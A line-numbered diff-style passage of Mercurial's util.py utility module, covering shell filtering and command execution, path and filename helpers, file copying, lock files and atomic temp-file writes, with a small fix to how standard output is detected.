987 988 def tempfilter(s, cmd):
988 989 '''filter string S through a pair of temporary files with CMD.
989 990 CMD is used as a template to create the real command to be run,
990 991 with the strings INFILE and OUTFILE replaced by the real names of
991 992 the temporary files generated.'''
992 993 inname, outname = None, None
993 994 try:
994 995 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
995 996 fp = os.fdopen(infd, pycompat.sysstr('wb'))
996 997 fp.write(s)
997 998 fp.close()
998 999 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
999 1000 os.close(outfd)
1000 1001 cmd = cmd.replace('INFILE', inname)
1001 1002 cmd = cmd.replace('OUTFILE', outname)
1002 1003 code = os.system(cmd)
1003 1004 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1004 1005 code = 0
1005 1006 if code:
1006 1007 raise Abort(_("command '%s' failed: %s") %
1007 1008 (cmd, explainexit(code)))
1008 1009 return readfile(outname)
1009 1010 finally:
1010 1011 try:
1011 1012 if inname:
1012 1013 os.unlink(inname)
1013 1014 except OSError:
1014 1015 pass
1015 1016 try:
1016 1017 if outname:
1017 1018 os.unlink(outname)
1018 1019 except OSError:
1019 1020 pass
1020 1021
1021 1022 filtertable = {
1022 1023 'tempfile:': tempfilter,
1023 1024 'pipe:': pipefilter,
1024 1025 }
1025 1026
1026 1027 def filter(s, cmd):
1027 1028 "filter a string through a command that transforms its input to its output"
1028 1029 for name, fn in filtertable.iteritems():
1029 1030 if cmd.startswith(name):
1030 1031 return fn(s, cmd[len(name):].lstrip())
1031 1032 return pipefilter(s, cmd)
1032 1033
1033 1034 def binary(s):
1034 1035 """return true if a string is binary data"""
1035 1036 return bool(s and '\0' in s)
1036 1037
1037 1038 def increasingchunks(source, min=1024, max=65536):
1038 1039 '''return no less than min bytes per chunk while data remains,
1039 1040 doubling min after each chunk until it reaches max'''
1040 1041 def log2(x):
1041 1042 if not x:
1042 1043 return 0
1043 1044 i = 0
1044 1045 while x:
1045 1046 x >>= 1
1046 1047 i += 1
1047 1048 return i - 1
1048 1049
1049 1050 buf = []
1050 1051 blen = 0
1051 1052 for chunk in source:
1052 1053 buf.append(chunk)
1053 1054 blen += len(chunk)
1054 1055 if blen >= min:
1055 1056 if min < max:
1056 1057 min = min << 1
1057 1058 nmin = 1 << log2(blen)
1058 1059 if nmin > min:
1059 1060 min = nmin
1060 1061 if min > max:
1061 1062 min = max
1062 1063 yield ''.join(buf)
1063 1064 blen = 0
1064 1065 buf = []
1065 1066 if buf:
1066 1067 yield ''.join(buf)
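
# A worked example (illustrative): with the defaults, a stream of small
# chunks is joined into blocks of at least 1024 bytes, with the threshold
# roughly doubling after each emitted block until it reaches the 65536-byte
# cap, so later writes are amortized over fewer, larger chunks.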
1067 1068
1068 1069 Abort = error.Abort
1069 1070
1070 1071 def always(fn):
1071 1072 return True
1072 1073
1073 1074 def never(fn):
1074 1075 return False
1075 1076
1076 1077 def nogc(func):
1077 1078 """disable garbage collector
1078 1079
1079 1080 Python's garbage collector triggers a GC each time a certain number of
1080 1081 container objects (the number being defined by gc.get_threshold()) are
1081 1082 allocated even when marked not to be tracked by the collector. Tracking has
1082 1083 no effect on when GCs are triggered, only on what objects the GC looks
1083 1084 into. As a workaround, disable GC while building complex (huge)
1084 1085 containers.
1085 1086
1086 1087 This garbage collector issue has been fixed in 2.7, but it still affects
1087 1088 CPython's performance.
1088 1089 """
1089 1090 def wrapper(*args, **kwargs):
1090 1091 gcenabled = gc.isenabled()
1091 1092 gc.disable()
1092 1093 try:
1093 1094 return func(*args, **kwargs)
1094 1095 finally:
1095 1096 if gcenabled:
1096 1097 gc.enable()
1097 1098 return wrapper
1098 1099
1099 1100 if pycompat.ispypy:
1100 1101 # PyPy runs slower with gc disabled
1101 1102 nogc = lambda x: x
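
# A typical use of nogc (illustrative, not part of util.py): decorate a
# function that builds a huge container so the allocation-count GC heuristic
# described above cannot fire mid-build.
#
#     @nogc
#     def buildbigmap(pairs):       # hypothetical helper
#         return dict(pairs)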
1102 1103
1103 1104 def pathto(root, n1, n2):
1104 1105 '''return the relative path from one place to another.
1105 1106 root should use os.sep to separate directories
1106 1107 n1 should use os.sep to separate directories
1107 1108 n2 should use "/" to separate directories
1108 1109 returns an os.sep-separated path.
1109 1110
1110 1111 If n1 is a relative path, it's assumed it's
1111 1112 relative to root.
1112 1113 n2 should always be relative to root.
1113 1114 '''
1114 1115 if not n1:
1115 1116 return localpath(n2)
1116 1117 if os.path.isabs(n1):
1117 1118 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1118 1119 return os.path.join(root, localpath(n2))
1119 1120 n2 = '/'.join((pconvert(root), n2))
1120 1121 a, b = splitpath(n1), n2.split('/')
1121 1122 a.reverse()
1122 1123 b.reverse()
1123 1124 while a and b and a[-1] == b[-1]:
1124 1125 a.pop()
1125 1126 b.pop()
1126 1127 b.reverse()
1127 1128 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
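
# A worked example of pathto (POSIX separators, illustrative):
#
#     pathto(b'/repo', b'a/b', b'a/c/d')  ->  b'../c/d'
#
# The common prefix 'a' is stripped, one '..' steps out of 'b', and the
# remainder 'c/d' is re-joined with os.sep.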
1128 1129
1129 1130 def mainfrozen():
1130 1131 """return True if we are a frozen executable.
1131 1132
1132 1133 The code supports py2exe (most common, Windows only) and tools/freeze
1133 1134 (portable, not much used).
1134 1135 """
1135 1136 return (safehasattr(sys, "frozen") or # new py2exe
1136 1137 safehasattr(sys, "importers") or # old py2exe
1137 1138 imp.is_frozen(u"__main__")) # tools/freeze
1138 1139
1139 1140 # the location of data files matching the source code
1140 1141 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1141 1142 # executable version (py2exe) doesn't support __file__
1142 1143 datapath = os.path.dirname(pycompat.sysexecutable)
1143 1144 else:
1144 1145 datapath = os.path.dirname(pycompat.fsencode(__file__))
1145 1146
1146 1147 i18n.setdatapath(datapath)
1147 1148
1148 1149 _hgexecutable = None
1149 1150
1150 1151 def hgexecutable():
1151 1152 """return location of the 'hg' executable.
1152 1153
1153 1154 Defaults to $HG or 'hg' in the search path.
1154 1155 """
1155 1156 if _hgexecutable is None:
1156 1157 hg = encoding.environ.get('HG')
1157 1158 mainmod = sys.modules[pycompat.sysstr('__main__')]
1158 1159 if hg:
1159 1160 _sethgexecutable(hg)
1160 1161 elif mainfrozen():
1161 1162 if getattr(sys, 'frozen', None) == 'macosx_app':
1162 1163 # Env variable set by py2app
1163 1164 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1164 1165 else:
1165 1166 _sethgexecutable(pycompat.sysexecutable)
1166 1167 elif (os.path.basename(
1167 1168 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1168 1169 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1169 1170 else:
1170 1171 exe = findexe('hg') or os.path.basename(sys.argv[0])
1171 1172 _sethgexecutable(exe)
1172 1173 return _hgexecutable
1173 1174
1174 1175 def _sethgexecutable(path):
1175 1176 """set location of the 'hg' executable"""
1176 1177 global _hgexecutable
1177 1178 _hgexecutable = path
1178 1179
1179 1180 def _isstdout(f):
1180 1181 fileno = getattr(f, 'fileno', None)
1182 try:
1181 1183 return fileno and fileno() == sys.__stdout__.fileno()
1184 except io.UnsupportedOperation:
1185 return False # fileno() raised UnsupportedOperation
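
# The guard added above matters because on Python 3 some file-like objects
# implement fileno() but raise rather than omit it (a sketch, not part of
# util.py):
#
#     >>> import io
#     >>> io.BytesIO().fileno()
#     Traceback (most recent call last):
#         ...
#     io.UnsupportedOperation: fileno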
1182 1186
1183 1187 def shellenviron(environ=None):
1184 1188 """return environ with optional override, useful for shelling out"""
1185 1189 def py2shell(val):
1186 1190 'convert python object into string that is useful to shell'
1187 1191 if val is None or val is False:
1188 1192 return '0'
1189 1193 if val is True:
1190 1194 return '1'
1191 1195 return pycompat.bytestr(val)
1192 1196 env = dict(encoding.environ)
1193 1197 if environ:
1194 1198 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1195 1199 env['HG'] = hgexecutable()
1196 1200 return env
1197 1201
1198 1202 def system(cmd, environ=None, cwd=None, out=None):
1199 1203 '''enhanced shell command execution.
1200 1204 run with environment maybe modified, maybe in different dir.
1201 1205
1202 1206 if out is specified, it is assumed to be a file-like object that has a
1203 1207 write() method. stdout and stderr will be redirected to out.'''
1204 1208 try:
1205 1209 stdout.flush()
1206 1210 except Exception:
1207 1211 pass
1208 1212 cmd = quotecommand(cmd)
1209 1213 env = shellenviron(environ)
1210 1214 if out is None or _isstdout(out):
1211 1215 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1212 1216 env=env, cwd=cwd)
1213 1217 else:
1214 1218 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1215 1219 env=env, cwd=cwd, stdout=subprocess.PIPE,
1216 1220 stderr=subprocess.STDOUT)
1217 1221 for line in iter(proc.stdout.readline, ''):
1218 1222 out.write(line)
1219 1223 proc.wait()
1220 1224 rc = proc.returncode
1221 1225 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1222 1226 rc = 0
1223 1227 return rc
1224 1228
1225 1229 def checksignature(func):
1226 1230 '''wrap a function with code to check for calling errors'''
1227 1231 def check(*args, **kwargs):
1228 1232 try:
1229 1233 return func(*args, **kwargs)
1230 1234 except TypeError:
1231 1235 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1232 1236 raise error.SignatureError
1233 1237 raise
1234 1238
1235 1239 return check
1236 1240
1237 1241 # a whitelist of known filesystems where hardlinks work reliably
1238 1242 _hardlinkfswhitelist = {
1239 1243 'btrfs',
1240 1244 'ext2',
1241 1245 'ext3',
1242 1246 'ext4',
1243 1247 'hfs',
1244 1248 'jfs',
1245 1249 'NTFS',
1246 1250 'reiserfs',
1247 1251 'tmpfs',
1248 1252 'ufs',
1249 1253 'xfs',
1250 1254 'zfs',
1251 1255 }
1252 1256
1253 1257 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1254 1258 '''copy a file, preserving mode and optionally other stat info like
1255 1259 atime/mtime
1256 1260
1257 1261 checkambig argument is used with filestat, and is useful only if
1258 1262 destination file is guarded by any lock (e.g. repo.lock or
1259 1263 repo.wlock).
1260 1264
1261 1265 copystat and checkambig should be exclusive.
1262 1266 '''
1263 1267 assert not (copystat and checkambig)
1264 1268 oldstat = None
1265 1269 if os.path.lexists(dest):
1266 1270 if checkambig:
1267 1271 oldstat = checkambig and filestat.frompath(dest)
1268 1272 unlink(dest)
1269 1273 if hardlink:
1270 1274 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1271 1275 # unless we are confident that dest is on a whitelisted filesystem.
1272 1276 try:
1273 1277 fstype = getfstype(os.path.dirname(dest))
1274 1278 except OSError:
1275 1279 fstype = None
1276 1280 if fstype not in _hardlinkfswhitelist:
1277 1281 hardlink = False
1278 1282 if hardlink:
1279 1283 try:
1280 1284 oslink(src, dest)
1281 1285 return
1282 1286 except (IOError, OSError):
1283 1287 pass # fall back to normal copy
1284 1288 if os.path.islink(src):
1285 1289 os.symlink(os.readlink(src), dest)
1286 1290 # copytime is ignored for symlinks, but in general copytime isn't needed
1287 1291 # for them anyway
1288 1292 else:
1289 1293 try:
1290 1294 shutil.copyfile(src, dest)
1291 1295 if copystat:
1292 1296 # copystat also copies mode
1293 1297 shutil.copystat(src, dest)
1294 1298 else:
1295 1299 shutil.copymode(src, dest)
1296 1300 if oldstat and oldstat.stat:
1297 1301 newstat = filestat.frompath(dest)
1298 1302 if newstat.isambig(oldstat):
1299 1303 # stat of copied file is ambiguous to original one
1300 1304 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1301 1305 os.utime(dest, (advanced, advanced))
1302 1306 except shutil.Error as inst:
1303 1307 raise Abort(str(inst))
1304 1308
1305 1309 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1306 1310 """Copy a directory tree using hardlinks if possible."""
1307 1311 num = 0
1308 1312
1309 1313 gettopic = lambda: hardlink and _('linking') or _('copying')
1310 1314
1311 1315 if os.path.isdir(src):
1312 1316 if hardlink is None:
1313 1317 hardlink = (os.stat(src).st_dev ==
1314 1318 os.stat(os.path.dirname(dst)).st_dev)
1315 1319 topic = gettopic()
1316 1320 os.mkdir(dst)
1317 1321 for name, kind in listdir(src):
1318 1322 srcname = os.path.join(src, name)
1319 1323 dstname = os.path.join(dst, name)
1320 1324 def nprog(t, pos):
1321 1325 if pos is not None:
1322 1326 return progress(t, pos + num)
1323 1327 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1324 1328 num += n
1325 1329 else:
1326 1330 if hardlink is None:
1327 1331 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1328 1332 os.stat(os.path.dirname(dst)).st_dev)
1329 1333 topic = gettopic()
1330 1334
1331 1335 if hardlink:
1332 1336 try:
1333 1337 oslink(src, dst)
1334 1338 except (IOError, OSError):
1335 1339 hardlink = False
1336 1340 shutil.copy(src, dst)
1337 1341 else:
1338 1342 shutil.copy(src, dst)
1339 1343 num += 1
1340 1344 progress(topic, num)
1341 1345 progress(topic, None)
1342 1346
1343 1347 return hardlink, num
1344 1348
1345 1349 _winreservednames = {
1346 1350 'con', 'prn', 'aux', 'nul',
1347 1351 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1348 1352 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1349 1353 }
1350 1354 _winreservedchars = ':*?"<>|'
1351 1355 def checkwinfilename(path):
1352 1356 r'''Check that the base-relative path is a valid filename on Windows.
1353 1357 Returns None if the path is ok, or a UI string describing the problem.
1354 1358
1355 1359 >>> checkwinfilename(b"just/a/normal/path")
1356 1360 >>> checkwinfilename(b"foo/bar/con.xml")
1357 1361 "filename contains 'con', which is reserved on Windows"
1358 1362 >>> checkwinfilename(b"foo/con.xml/bar")
1359 1363 "filename contains 'con', which is reserved on Windows"
1360 1364 >>> checkwinfilename(b"foo/bar/xml.con")
1361 1365 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1362 1366 "filename contains 'AUX', which is reserved on Windows"
1363 1367 >>> checkwinfilename(b"foo/bar/bla:.txt")
1364 1368 "filename contains ':', which is reserved on Windows"
1365 1369 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1366 1370 "filename contains '\\x07', which is invalid on Windows"
1367 1371 >>> checkwinfilename(b"foo/bar/bla ")
1368 1372 "filename ends with ' ', which is not allowed on Windows"
1369 1373 >>> checkwinfilename(b"../bar")
1370 1374 >>> checkwinfilename(b"foo\\")
1371 1375 "filename ends with '\\', which is invalid on Windows"
1372 1376 >>> checkwinfilename(b"foo\\/bar")
1373 1377 "directory name ends with '\\', which is invalid on Windows"
1374 1378 '''
1375 1379 if path.endswith('\\'):
1376 1380 return _("filename ends with '\\', which is invalid on Windows")
1377 1381 if '\\/' in path:
1378 1382 return _("directory name ends with '\\', which is invalid on Windows")
1379 1383 for n in path.replace('\\', '/').split('/'):
1380 1384 if not n:
1381 1385 continue
1382 1386 for c in _filenamebytestr(n):
1383 1387 if c in _winreservedchars:
1384 1388 return _("filename contains '%s', which is reserved "
1385 1389 "on Windows") % c
1386 1390 if ord(c) <= 31:
1387 1391 return _("filename contains '%s', which is invalid "
1388 1392 "on Windows") % escapestr(c)
1389 1393 base = n.split('.')[0]
1390 1394 if base and base.lower() in _winreservednames:
1391 1395 return _("filename contains '%s', which is reserved "
1392 1396 "on Windows") % base
1393 1397 t = n[-1:]
1394 1398 if t in '. ' and n not in '..':
1395 1399 return _("filename ends with '%s', which is not allowed "
1396 1400 "on Windows") % t
1397 1401
1398 1402 if pycompat.iswindows:
1399 1403 checkosfilename = checkwinfilename
1400 1404 timer = time.clock
1401 1405 else:
1402 1406 checkosfilename = platform.checkosfilename
1403 1407 timer = time.time
1404 1408
1405 1409 if safehasattr(time, "perf_counter"):
1406 1410 timer = time.perf_counter
1407 1411
1408 1412 def makelock(info, pathname):
1409 1413 try:
1410 1414 return os.symlink(info, pathname)
1411 1415 except OSError as why:
1412 1416 if why.errno == errno.EEXIST:
1413 1417 raise
1414 1418 except AttributeError: # no symlink in os
1415 1419 pass
1416 1420
1417 1421 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1418 1422 os.write(ld, info)
1419 1423 os.close(ld)
1420 1424
1421 1425 def readlock(pathname):
1422 1426 try:
1423 1427 return os.readlink(pathname)
1424 1428 except OSError as why:
1425 1429 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1426 1430 raise
1427 1431 except AttributeError: # no symlink in os
1428 1432 pass
1429 1433 fp = posixfile(pathname)
1430 1434 r = fp.read()
1431 1435 fp.close()
1432 1436 return r
1433 1437
1434 1438 def fstat(fp):
1435 1439 '''stat file object that may not have fileno method.'''
1436 1440 try:
1437 1441 return os.fstat(fp.fileno())
1438 1442 except AttributeError:
1439 1443 return os.stat(fp.name)
1440 1444
1441 1445 # File system features
1442 1446
1443 1447 def fscasesensitive(path):
1444 1448 """
1445 1449 Return true if the given path is on a case-sensitive filesystem
1446 1450
1447 1451 Requires a path (like /foo/.hg) ending with a foldable final
1448 1452 directory component.
1449 1453 """
1450 1454 s1 = os.lstat(path)
1451 1455 d, b = os.path.split(path)
1452 1456 b2 = b.upper()
1453 1457 if b == b2:
1454 1458 b2 = b.lower()
1455 1459 if b == b2:
1456 1460 return True # no evidence against case sensitivity
1457 1461 p2 = os.path.join(d, b2)
1458 1462 try:
1459 1463 s2 = os.lstat(p2)
1460 1464 if s2 == s1:
1461 1465 return False
1462 1466 return True
1463 1467 except OSError:
1464 1468 return True
1465 1469
1466 1470 try:
1467 1471 import re2
1468 1472 _re2 = None
1469 1473 except ImportError:
1470 1474 _re2 = False
1471 1475
1472 1476 class _re(object):
1473 1477 def _checkre2(self):
1474 1478 global _re2
1475 1479 try:
1476 1480 # check if match works, see issue3964
1477 1481 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1478 1482 except ImportError:
1479 1483 _re2 = False
1480 1484
1481 1485 def compile(self, pat, flags=0):
1482 1486 '''Compile a regular expression, using re2 if possible
1483 1487
1484 1488 For best performance, use only re2-compatible regexp features. The
1485 1489 only flags from the re module that are re2-compatible are
1486 1490 IGNORECASE and MULTILINE.'''
1487 1491 if _re2 is None:
1488 1492 self._checkre2()
1489 1493 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1490 1494 if flags & remod.IGNORECASE:
1491 1495 pat = '(?i)' + pat
1492 1496 if flags & remod.MULTILINE:
1493 1497 pat = '(?m)' + pat
1494 1498 try:
1495 1499 return re2.compile(pat)
1496 1500 except re2.error:
1497 1501 pass
1498 1502 return remod.compile(pat, flags)
1499 1503
1500 1504 @propertycache
1501 1505 def escape(self):
1502 1506 '''Return the version of escape corresponding to self.compile.
1503 1507
1504 1508 This is imperfect because whether re2 or re is used for a particular
1505 1509 function depends on the flags, etc, but it's the best we can do.
1506 1510 '''
1507 1511 global _re2
1508 1512 if _re2 is None:
1509 1513 self._checkre2()
1510 1514 if _re2:
1511 1515 return re2.escape
1512 1516 else:
1513 1517 return remod.escape
1514 1518
1515 1519 re = _re()
1516 1520
1517 1521 _fspathcache = {}
1518 1522 def fspath(name, root):
1519 1523 '''Get name in the case stored in the filesystem
1520 1524
1521 1525 The name should be relative to root, and be normcase-ed for efficiency.
1522 1526
1523 1527 Note that this function is unnecessary, and should not be
1524 1528 called, for case-sensitive filesystems (simply because it's expensive).
1525 1529
1526 1530 The root should be normcase-ed, too.
1527 1531 '''
1528 1532 def _makefspathcacheentry(dir):
1529 1533 return dict((normcase(n), n) for n in os.listdir(dir))
1530 1534
1531 1535 seps = pycompat.ossep
1532 1536 if pycompat.osaltsep:
1533 1537 seps = seps + pycompat.osaltsep
1534 1538 # Protect backslashes. This gets silly very quickly.
1535 1539 seps = seps.replace('\\','\\\\')
1536 1540 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1537 1541 dir = os.path.normpath(root)
1538 1542 result = []
1539 1543 for part, sep in pattern.findall(name):
1540 1544 if sep:
1541 1545 result.append(sep)
1542 1546 continue
1543 1547
1544 1548 if dir not in _fspathcache:
1545 1549 _fspathcache[dir] = _makefspathcacheentry(dir)
1546 1550 contents = _fspathcache[dir]
1547 1551
1548 1552 found = contents.get(part)
1549 1553 if not found:
1550 1554 # retry "once per directory" per "dirstate.walk" which
1551 1555 # may take place for each patch of "hg qpush", for example
1552 1556 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1553 1557 found = contents.get(part)
1554 1558
1555 1559 result.append(found or part)
1556 1560 dir = os.path.join(dir, part)
1557 1561
1558 1562 return ''.join(result)
1559 1563
1560 1564 def checknlink(testfile):
1561 1565 '''check whether hardlink count reporting works properly'''
1562 1566
1563 1567 # testfile may be open, so we need a separate file for checking to
1564 1568 # work around issue2543 (or testfile may get lost on Samba shares)
1565 1569 f1, f2, fp = None, None, None
1566 1570 try:
1567 1571 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1568 1572 suffix='1~', dir=os.path.dirname(testfile))
1569 1573 os.close(fd)
1570 1574 f2 = '%s2~' % f1[:-2]
1571 1575
1572 1576 oslink(f1, f2)
1573 1577 # nlinks() may behave differently for files on Windows shares if
1574 1578 # the file is open.
1575 1579 fp = posixfile(f2)
1576 1580 return nlinks(f2) > 1
1577 1581 except OSError:
1578 1582 return False
1579 1583 finally:
1580 1584 if fp is not None:
1581 1585 fp.close()
1582 1586 for f in (f1, f2):
1583 1587 try:
1584 1588 if f is not None:
1585 1589 os.unlink(f)
1586 1590 except OSError:
1587 1591 pass
1588 1592
1589 1593 def endswithsep(path):
1590 1594 '''Check path ends with os.sep or os.altsep.'''
1591 1595 return (path.endswith(pycompat.ossep)
1592 1596 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1593 1597
1594 1598 def splitpath(path):
1595 1599 '''Split path by os.sep.
1596 1600 Note that this function does not use os.altsep because it is
1597 1601 meant as a simple alternative to "xxx.split(os.sep)".
1598 1602 It is recommended to use os.path.normpath() before using this
1599 1603 function if needed.'''
1600 1604 return path.split(pycompat.ossep)
1601 1605
1602 1606 def gui():
1603 1607 '''Are we running in a GUI?'''
1604 1608 if pycompat.isdarwin:
1605 1609 if 'SSH_CONNECTION' in encoding.environ:
1606 1610 # handle SSH access to a box where the user is logged in
1607 1611 return False
1608 1612 elif getattr(osutil, 'isgui', None):
1609 1613 # check if a CoreGraphics session is available
1610 1614 return osutil.isgui()
1611 1615 else:
1612 1616 # pure build; use a safe default
1613 1617 return True
1614 1618 else:
1615 1619 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1616 1620
1617 1621 def mktempcopy(name, emptyok=False, createmode=None):
1618 1622 """Create a temporary file with the same contents from name
1619 1623
1620 1624 The permission bits are copied from the original file.
1621 1625
1622 1626 If the temporary file is going to be truncated immediately, you
1623 1627 can use emptyok=True as an optimization.
1624 1628
1625 1629 Returns the name of the temporary file.
1626 1630 """
1627 1631 d, fn = os.path.split(name)
1628 1632 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1629 1633 os.close(fd)
1630 1634 # Temporary files are created with mode 0600, which is usually not
1631 1635 # what we want. If the original file already exists, just copy
1632 1636 # its mode. Otherwise, manually obey umask.
1633 1637 copymode(name, temp, createmode)
1634 1638 if emptyok:
1635 1639 return temp
1636 1640 try:
1637 1641 try:
1638 1642 ifp = posixfile(name, "rb")
1639 1643 except IOError as inst:
1640 1644 if inst.errno == errno.ENOENT:
1641 1645 return temp
1642 1646 if not getattr(inst, 'filename', None):
1643 1647 inst.filename = name
1644 1648 raise
1645 1649 ofp = posixfile(temp, "wb")
1646 1650 for chunk in filechunkiter(ifp):
1647 1651 ofp.write(chunk)
1648 1652 ifp.close()
1649 1653 ofp.close()
1650 1654 except: # re-raises
1651 1655 try:
1652 1656 os.unlink(temp)
1653 1657 except OSError:
1654 1658 pass
1655 1659 raise
1656 1660 return temp
1657 1661
1658 1662 class filestat(object):
1659 1663 """help to exactly detect change of a file
1660 1664
1661 1665 'stat' attribute is the result of 'os.stat()' if the specified 'path'
1662 1666 exists. Otherwise, it is None. This can avoid a preparatory
1663 1667 'exists()' examination on the client side of this class.
1664 1668 """
1665 1669 def __init__(self, stat):
1666 1670 self.stat = stat
1667 1671
1668 1672 @classmethod
1669 1673 def frompath(cls, path):
1670 1674 try:
1671 1675 stat = os.stat(path)
1672 1676 except OSError as err:
1673 1677 if err.errno != errno.ENOENT:
1674 1678 raise
1675 1679 stat = None
1676 1680 return cls(stat)
1677 1681
1678 1682 @classmethod
1679 1683 def fromfp(cls, fp):
1680 1684 stat = os.fstat(fp.fileno())
1681 1685 return cls(stat)
1682 1686
1683 1687 __hash__ = object.__hash__
1684 1688
1685 1689 def __eq__(self, old):
1686 1690 try:
1687 1691 # if ambiguity between stat of new and old file is
1688 1692 # avoided, comparison of size, ctime and mtime is enough
1689 1693 # to exactly detect change of a file regardless of platform
1690 1694 return (self.stat.st_size == old.stat.st_size and
1691 1695 self.stat.st_ctime == old.stat.st_ctime and
1692 1696 self.stat.st_mtime == old.stat.st_mtime)
1693 1697 except AttributeError:
1694 1698 pass
1695 1699 try:
1696 1700 return self.stat is None and old.stat is None
1697 1701 except AttributeError:
1698 1702 return False
1699 1703
1700 1704 def isambig(self, old):
1701 1705 """Examine whether new (= self) stat is ambiguous against old one
1702 1706
1703 1707 "S[N]" below means stat of a file at N-th change:
1704 1708
1705 1709 - S[n-1].ctime < S[n].ctime: can detect change of a file
1706 1710 - S[n-1].ctime == S[n].ctime
1707 1711 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1708 1712 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1709 1713 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1710 1714 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1711 1715
1712 1716 Case (*2) above means that a file was changed twice or more within
1713 1717 the same second (= S[n-1].ctime), and comparison of timestamps
1714 1718 is ambiguous.
1715 1719
1716 1720 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1717 1721 timestamp is ambiguous".
1718 1722
1719 1723 But advancing mtime only in case (*2) doesn't work as
1720 1724 expected, because naturally advanced S[n].mtime in case (*1)
1721 1725 might be equal to manually advanced S[n-1 or earlier].mtime.
1722 1726
1723 1727 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1724 1728 treated as ambiguous regardless of mtime, to avoid overlooking
1725 1729 changes hidden by collisions between such mtimes.
1726 1730
1727 1731 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1728 1732 S[n].mtime", even if size of a file isn't changed.
1729 1733 """
1730 1734 try:
1731 1735 return (self.stat.st_ctime == old.stat.st_ctime)
1732 1736 except AttributeError:
1733 1737 return False
1734 1738
1735 1739 def avoidambig(self, path, old):
1736 1740 """Change file stat of specified path to avoid ambiguity
1737 1741
1738 1742 'old' should be previous filestat of 'path'.
1739 1743
1740 1744 This skips avoiding ambiguity if the process doesn't have
1741 1745 appropriate privileges for 'path', and returns False in that
1742 1746 case.
1743 1747
1744 1748 Otherwise, this returns True, as "ambiguity is avoided".
1745 1749 """
1746 1750 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1747 1751 try:
1748 1752 os.utime(path, (advanced, advanced))
1749 1753 except OSError as inst:
1750 1754 if inst.errno == errno.EPERM:
1751 1755 # utime() on the file created by another user causes EPERM,
1752 1756 # if a process doesn't have appropriate privileges
1753 1757 return False
1754 1758 raise
1755 1759 return True
1756 1760
1757 1761 def __ne__(self, other):
1758 1762 return not self == other
1759 1763
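# Illustrative sketch (not part of the original module): using filestat to
# decide whether a rewrite left the stat ambiguous (new ctime equal to the
# old one). The path '.hg/cache/tags' is hypothetical.
#
#     old = filestat.frompath('.hg/cache/tags')
#     writefile('.hg/cache/tags', b'refreshed content')
#     new = filestat.frompath('.hg/cache/tags')
#     if new.isambig(old):
#         # size/ctime/mtime alone cannot prove the file changed;
#         # bump mtime so later comparisons are unambiguous
#         new.avoidambig('.hg/cache/tags', old)
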
1760 1764 class atomictempfile(object):
1761 1765 '''writable file object that atomically updates a file
1762 1766
1763 1767 All writes will go to a temporary copy of the original file. Call
1764 1768 close() when you are done writing, and atomictempfile will rename
1765 1769 the temporary copy to the original name, making the changes
1766 1770 visible. If the object is destroyed without being closed, all your
1767 1771 writes are discarded.
1768 1772
1769 1773 checkambig argument of constructor is used with filestat, and is
1770 1774 useful only if target file is guarded by any lock (e.g. repo.lock
1771 1775 or repo.wlock).
1772 1776 '''
1773 1777 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1774 1778 self.__name = name # permanent name
1775 1779 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1776 1780 createmode=createmode)
1777 1781 self._fp = posixfile(self._tempname, mode)
1778 1782 self._checkambig = checkambig
1779 1783
1780 1784 # delegated methods
1781 1785 self.read = self._fp.read
1782 1786 self.write = self._fp.write
1783 1787 self.seek = self._fp.seek
1784 1788 self.tell = self._fp.tell
1785 1789 self.fileno = self._fp.fileno
1786 1790
1787 1791 def close(self):
1788 1792 if not self._fp.closed:
1789 1793 self._fp.close()
1790 1794 filename = localpath(self.__name)
1791 1795 oldstat = self._checkambig and filestat.frompath(filename)
1792 1796 if oldstat and oldstat.stat:
1793 1797 rename(self._tempname, filename)
1794 1798 newstat = filestat.frompath(filename)
1795 1799 if newstat.isambig(oldstat):
1796 1800 # stat of changed file is ambiguous to original one
1797 1801 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1798 1802 os.utime(filename, (advanced, advanced))
1799 1803 else:
